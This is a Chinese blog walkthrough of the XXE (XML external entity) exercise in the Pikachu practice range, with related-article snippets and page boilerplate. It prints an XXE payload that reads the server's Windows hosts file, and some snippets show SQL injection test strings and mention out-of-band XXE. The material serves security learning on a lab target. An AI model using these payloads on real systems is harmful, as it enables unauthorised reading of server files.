皮卡丘(pikachu)XXE

已于 2023-03-14 09:38:15 修改
阅读量2.5k 收藏 1
点赞数 2
分类专栏: 靶场 网络安全 WriteUp 文章标签: 网络安全
于 2021-07-23 10:25:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44787832/article/details/119025514
版权
靶场 同时被 3 个专栏收录
15 篇文章 2 订阅
订阅专栏
WriteUp
14 篇文章 1 订阅
订阅专栏
网络安全
13 篇文章 2 订阅
订阅专栏

XXE漏洞

第一部分:XML声明部分

<?xml version="1.0"?>

第二部分:文档类型定义 DTD

<!DOCTYPE note[

<!--定义此文档是note类型的文档-->

<!ENTITY entity-name SYSTEM "URI/URL">

<!--外部实体声明-->

]>

第三部分:文档元素

<note>

<to>Dave</to>

<from>Tom</from>

<head>Reminder</head>

<body>You are a good man</body>

</note>

DTD(Document Type Definition,文档类型定义),用来为 XML 文档定义语法约束,可以是内部申明也可以使引用外部.

DTD现在很多语言里面对应的解析xml的函数默认是禁止解析外部实体内容的,从而也就直接避免了这个漏洞。

使用payload

<?xml version = "1.0"?><!DOCTYPE note [    <!ENTITY hacker "天津曲艺团">]><name>&hacker;</name>
 

提交后,可以看到前端返回了我们在xml中的DTD定义变量的值

如果我们输入恶意的payload,通过外部实体引用从而去获取后台服务器的本地文件信息。(外部引用可以支持http,file,ftp等协议)
 

Payload:
 

<?xml version = "1.0"?> <!DOCTYPE ANY [     <!ENTITY f SYSTEM "file:///C://Windows/System32/drivers/etc/hosts">   ]> <x>&f;</x>
 

 

使用这样的方法我们就可以读取对应服务器的文件了          

                

        

        

    




            

                    
            

    

      

        

            

              
                
                  天津曲艺团
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                    2
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    1
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                    0
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      

            

                专栏目录
          










                



	

		

			

				
					
python皮卡丘Pikachu.py

				
			

			

				

					12-20
				

			

		

		

			
				
python源代码,可直接运行,使用turtle画的皮卡丘

			
		

	



                

              
                



	

		

			

				
					
piKachu:皮卡丘来了

				
			

			

				

					04-28
				

			

		

		

			
				
"piKachu:皮卡丘来了" 这个项目似乎是一个与JavaScript相关的创意作品,可能是用编程语言来绘制或模拟可爱的皮卡丘形象。在JavaScript这个广泛的领域里,我们可以探讨以下几个核心知识点:  1. **HTML5 Canvas**: ...

			
		

	



                


  
              

                


	

		

			

				
					
pikachu XXE (XML外部实体注入)(皮卡丘漏洞平台通关系列)

				
			

			

				

					箭雨镜屋
				

				

					02-17
					
					6608
					
				

			

		

		

			
				
一、来自官方的介绍以及来自民间的扩展

1、pikachu官方简介



2、小女子之前画的脑图



3、两个个人感觉不错的博客

https://www.freebuf.com/articles/web/177979.html

https://lalajun.github.io/2019/12/03/WEB-XXE/


...

			
		

	





	

		

			

				
					
安全渗透学习- PikachuXXE

				
			

			

				

					重启专家的博客
				

				

					09-12
					
					722
					
				

			

		

		

			
				
XXE(XML External Entity Injection) XML外部实体注入

与SQL注入相对应,XXE就是在可以解析XML的地方(比如一个输入框等处)只要可以解析XML语言的代码就可以,在这种地方提交XML的恶意代码来执行。



XXE漏洞主要也是因为没有对用户输入(用户提交的数据,比如你在输入框输入这个XML恶意代码)并没有合理检测与过滤,将用户提交的数据当XML来执行,造成XXE(XML外部实体注入),最简单的利用方法其实就是用hackbar V2里的XXE选项,它自带了XXE的pay

			
		

	



		

			
		



	

		

			

				
					
pikachu-xxe

				
			

			

				

					m0_62094846的博客
				

				

					09-19
					
					250
					
				

			

		

		

			
				
然后就能在本地的日志里看到test.txt的内容了(要开访问日志权限)但是这里面返回速度很快的,在网页上测试的时候还是回显很慢,感觉有点问题。但是扫描80端口会快,81会慢,因为80端口开放了。点 response received进行排序。在WWW下保存以test.dtd为名的文件。选择 response received。测试一下是否有xxe漏洞,且是否有回显。把echo $html 注释掉。两个回显都是这样的报错信息。填好数据,然后开始爆破。表示出来,再进行排序。

			
		

	





	

		

			

				
					
XXE漏洞原理和pikachu靶场实验

					
最新发布

				
			

			

				

					
				

				

					03-16
					
					1103
					
				

			

		

		

			
				
本文介绍XXE漏洞原理、危害和分类,以及pikachu靶场XXE4个实验。

			
		

	





	

		

			

				
					
pikachu--xxe

				
			

			

				

					qq_43660551的博客
				

				

					07-12
					
					211
					
				

			

		

		

			
				
发现这里采用post方式传输数据,且没对xml参数进行过滤,simplexml_load_string()函数将用户传入的xml直接转换为SimpleXMLElement对象,故这里存在被篡改参数内容,造成xxe的漏洞。现在很多语言里面对应的解析xml的函数默认是禁止解析外部实体内容的,从而也就直接避免了这个漏洞。以PHP为例,在PHP里面解析xml用的是libxml,其在≥2.9.0的版本中,默认是禁止解析xml外部实体内容的。写一个正经的xml。

			
		

	





	

		

			

				
					
pikachu LINUX安装包,

				
			

			

				

					07-14
				

			

		

		

			
				
上传到根目录,解压直接就问访问,里面有教程

			
		

	





	

		

			

				
					
pikachu-master

				
			

			

				

					05-04
				

			

		

		

			
				
Pikachu漏洞测试平台搭建详解》  在网络安全领域,漏洞测试是确保系统安全的重要环节。Pikachu,一个以小精灵命名的漏洞测试平台,因其易用性和实用性,成为了许多安全研究人员和初学者的首选工具。本文将详细介绍...

			
		

	





	

		

			

				
					
pikachu.zip

				
			

			

				

					04-02
				

			

		

		

			
				
"pikachu.zip"这个压缩包文件包含了一个特别针对目标识别任务构建的数据集,专注于识别皮卡丘这一角色。在这个数据集中,图像被转换为MXNet框架所使用的RecordIO格式,这是一种高效存储和处理大量图像数据的方法。  ...

			
		

	





	

		

			

				
					
pikachu.py_pythonturtle库画皮卡丘_

				
			

			

				

					10-04
				

			

		

		

			
				
在`pikachu.py`这个文件中,我们可以预期它会定义一个或多个函数,这些函数将利用`turtle`库的特性来绘制皮卡丘的头部特征。皮卡丘的头通常包括两个大大的黄色耳朵、一张微笑的脸、两只眼睛、一个红色的鼻子和脸颊上...

			
		

	





	

		

			

				
					
pikachu靶场全部通关.pdf

				
			

			

				

					08-16
				

			

		

		

			
				
由于在有道云写的,不好发博客,只能这样子,个人结合B站视频,总结

			
		

	





	

		

			

				
					
皮卡丘靶场,初始化就能用

				
			

			

				

					09-24
				

			

		

		

			
				
安装过程首先需要解压文件"Pikachu-master",这通常是一个包含整个靶场系统的源代码压缩包。解压后,用户会看到一系列的文件和文件夹,这些可能包括系统配置文件、数据库连接参数、Web服务器的HTML、PHP脚本等。在...

			
		

	





	

		

			

				
					
pikachu靶场通关

				
			

			

				

					11-19
				

			

		

		

			
				
pikachu靶场通关

			
		

	





	

		

			

				
					
pikachu靶场环境

				
			

			

				

					02-12
				

			

		

		

			
				
"pikachu靶场环境" 是一个专门为网络安全学习和实践设计的平台,它为用户提供了一个安全的、受控的环境来模拟真实的网络攻击与防御场景。在这个环境中,参与者可以学习和提升自己的渗透测试技巧,同时了解如何加固...

			
		

	





	

		

			

				
					
Pikachu-XXE

				
			

			

				

					baynk的博客
				

				

					11-19
					
					4028
					
				

			

		

		

			
				
0x00  XXE -“xml external entity injection”
既"xml外部实体注入漏洞"。
概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题"
也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。
现在很多语言里面对应的解析xml的函数默认是禁止解析外部实体内容的,从...

			
		

	





	

		

			

				
					
XXE外部实体注入漏洞(皮卡丘通关系列)

				
			

			

				

					weixin_60508121的博客
				

				

					05-06
					
					274
					
				

			

		

		

			
				
XXE-外部实体注入漏洞





随便输入个非xml内容,会有一些提示





随便输入个包含命名实体的xml数据

<?xml version="1.0"?>

<!DOCTYPE foo [  

<!ENTITY xxe "吉同" > ]>

<foo>&xxe;</foo>

网页上回显 吉同 ,说明网页多输入的xml数据是有结果回显的。







接下来可以用带外部实体注入的方法,来确定是否支持外部实体,

...

			
		

	





	

		

			

				
					
PIKACHUXXE

				
			

			

				

					qq_62078839的博客
				

				

					04-18
					
					791
					
				

			

		

		

			
				
概述


XXE -"xml external entity injection"
既"xml外部实体注入漏洞"。
概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题"
也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。
具体的关于xml实体的介绍,网络上有很多,自己动手先查一下。
现在很多语言里面对应的解析xml的函数默认是禁止解析外部实体内容的,从而也就直接避免了这个漏洞。
以PHP为例,在PHP里

			
		

	





	

		

			

				
					
小破站【pikachu 皮卡丘渗透靶场】 之 SQL注入 自学全套笔记

				
			

			

				

					algae
				

				

					04-16
					
					4205
					
				

			

		

		

			
				
sql.txt大纲

数字型测试:

$id=$_POST['id']


select 字段1,字段2 from 表名 where id = 1 or 1=1;


字符型测试:


$uname=$_GET['username']

select 字段1,字段2 from 表名 where username='kobe' or 1=1#';


搜索型测试:

like '%%'

...

			
		

	





	

		

			

				
					
pikachu XXE

				
			

			

				

					08-31
				

			

		

		

			
				
pikachu是一个开源的漏洞扫描工具,XXE(XML External Entity)漏洞是其中一个模块。 XXE漏洞是指攻击者通过构造恶意的XML实体来访问本地或远程文件系统,从而获取敏感信息或执行任意代码。这样的漏洞通常出现在使用...

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值